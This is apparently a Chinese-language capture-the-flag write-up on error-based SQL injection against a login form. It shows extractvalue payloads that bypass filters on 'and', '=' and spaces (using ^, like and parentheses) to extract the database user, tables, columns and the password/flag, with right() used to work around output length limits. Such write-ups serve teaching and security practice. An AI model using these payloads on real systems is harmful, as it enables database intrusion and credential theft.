记得比赛的时候我用的是报错注入
随便输入用户名和密码进行抓包。
用户名输入单引号之后报错,简单测试一下and or这些被过滤掉了
使用^异或符号替换and
证明可以使用^替换,^符号未被过滤,添加报错注入的payload,报错注入的原理网上有很多优秀的文章,使用payload之前可以先看一下:
extractvalue(1,concat(0x7e,user(),0x7e))
添加到burpsuite里面就变成了(最后的^'1 是为了闭合引号):
1%27^extractvalue(1,concat(0x7e,user(),0x7e))^'1
成功报错注出了数据库用户名
做的过程中发现还过滤了等号=和空格
等号可以使用like来代替,空格使用()括号来代替
payload修改为:
1%27^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like%27geek%27),0x7e))^'1
表名为:H4rDsq1
进一步获取数据:
1%27^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like%27H4rDsq1%27),0x7e))^'1
应该是要获取password
1%27^extractvalue(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1)),0x7e))^'1
因为extractvalue和updatexml函数都只能一次最多显示32位,在原有payload基础上修改.
本来想用mid函数的,但是被过滤了,换right函数输出后面的flag
payload修改为:
1%27^extractvalue(1,concat(0x7e,(select(group_concat(right(password,13)))from(H4rDsq1)),0x7e))^'1
与之前的flag拼接一下,注意这里我多出了几位,需要把重复的位数去除,就拿到完整的flag啦